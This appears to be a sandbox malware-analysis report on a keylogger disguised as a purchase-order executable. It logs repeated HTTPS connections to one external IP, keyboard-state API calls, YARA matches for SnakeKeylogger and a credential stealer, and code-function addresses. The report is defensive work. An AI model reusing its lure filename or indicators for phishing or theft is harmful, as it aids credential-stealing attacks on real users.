Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50004 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50087 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50104 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50107 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50108 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50112 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50122 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50130 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50136 version: TLS 1.2

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Code function: 0_2_0B883230 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,

0_2_0B883230

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_00F9DD14	0_2_00F9DD14
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_02B676C8	0_2_02B676C8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_02B60006	0_2_02B60006
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_02B60040	0_2_02B60040
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_02B676B8	0_2_02B676B8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_070203C8	0_2_070203C8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_07022728	0_2_07022728
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_07023798	0_2_07023798
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0710A760	0_2_0710A760
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0710C440	0_2_0710C440
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0710A328	0_2_0710A328
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_07108FB0	0_2_07108FB0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_07109EF0	0_2_07109EF0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0710AB98	0_2_0710AB98
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0751A708	0_2_0751A708
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_07510D46	0_2_07510D46
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_07513528	0_2_07513528
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_07510040	0_2_07510040
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0751A6F8	0_2_0751A6F8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0B880040	0_2_0B880040
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0B887590	0_2_0B887590
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0B880040	0_2_0B880040
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0C468CB8	0_2_0C468CB8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0C465EF9	0_2_0C465EF9
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0C46DEB0	0_2_0C46DEB0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0C46EF30	0_2_0C46EF30
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0C46DEB0	0_2_0C46DEB0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 0_2_0C46F16D	0_2_0C46F16D
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0273D278	4_2_0273D278
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_02735362	4_2_02735362
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0273A088	4_2_0273A088
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0273C147	4_2_0273C147
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0273C738	4_2_0273C738
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0273C468	4_2_0273C468
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0273CA08	4_2_0273CA08
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_027369A0	4_2_027369A0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0273E988	4_2_0273E988
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_02736FC8	4_2_02736FC8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0273CFAB	4_2_0273CFAB
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0273CCD8	4_2_0273CCD8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0273E97B	4_2_0273E97B
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0273F98C	4_2_0273F98C
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_02733E09	4_2_02733E09
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_053581D0	4_2_053581D0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05357B78	4_2_05357B78
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05358FB0	4_2_05358FB0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05350D39	4_2_05350D39
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535A938	4_2_0535A938
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535E538	4_2_0535E538
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535A928	4_2_0535A928
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535C558	4_2_0535C558
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05350D48	4_2_05350D48
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535E548	4_2_0535E548
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535C548	4_2_0535C548
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_053511A0	4_2_053511A0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05351190	4_2_05351190
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_053515F8	4_2_053515F8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535C9E8	4_2_0535C9E8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_053515E8	4_2_053515E8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535E9D8	4_2_0535E9D8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535C9D8	4_2_0535C9D8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535E9C8	4_2_0535E9C8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05356030	4_2_05356030
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535BC38	4_2_0535BC38
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535DC28	4_2_0535DC28
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535BC2A	4_2_0535BC2A
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535DC19	4_2_0535DC19
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535FC18	4_2_0535FC18
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05353007	4_2_05353007
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05350006	4_2_05350006
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05353008	4_2_05353008
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05353460	4_2_05353460
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535A460	4_2_0535A460
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05353450	4_2_05353450
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05350040	4_2_05350040
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535C0B7	4_2_0535C0B7
